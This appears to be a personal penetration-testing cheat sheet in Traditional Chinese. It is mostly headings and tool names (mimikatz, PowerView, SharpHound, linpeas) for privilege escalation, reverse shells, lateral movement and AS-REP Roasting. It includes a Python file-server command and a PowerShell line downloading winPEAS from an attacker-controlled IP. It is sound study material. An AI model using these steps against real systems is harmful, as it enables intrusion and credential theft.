跳到主內容

【總覽】Tools

常用網站

提權

編碼

寫作

reverse shell

 

連線

remote desk top

portforward

橫移
Tunnel

 

分享

smb

apache

    • systemctl start apache2

python

    • python3 -m http.server 80

列舉

  • namp ( ip, port 掃描)
masscan (port 掃描) rustscan (port 掃描) getcap (uid設置檔案)uid 設置檔案) mimikatz (AD 雜湊提取) PowerView (AD 列舉) Sharphound (AD 列舉)  + BloodHound (圖形化分析) linuxlinpeas (AD 弱點掃描) Seatbelt (AD 弱點掃描) searchsploit 

提權

字典

密碼破解

漏洞確認

AS-REP Roasting

Powershell

  • iwr (檔案下載)
    iwr -uri http://192.168.45.175/winPEASx64.exe -Outfile winPEAS.exe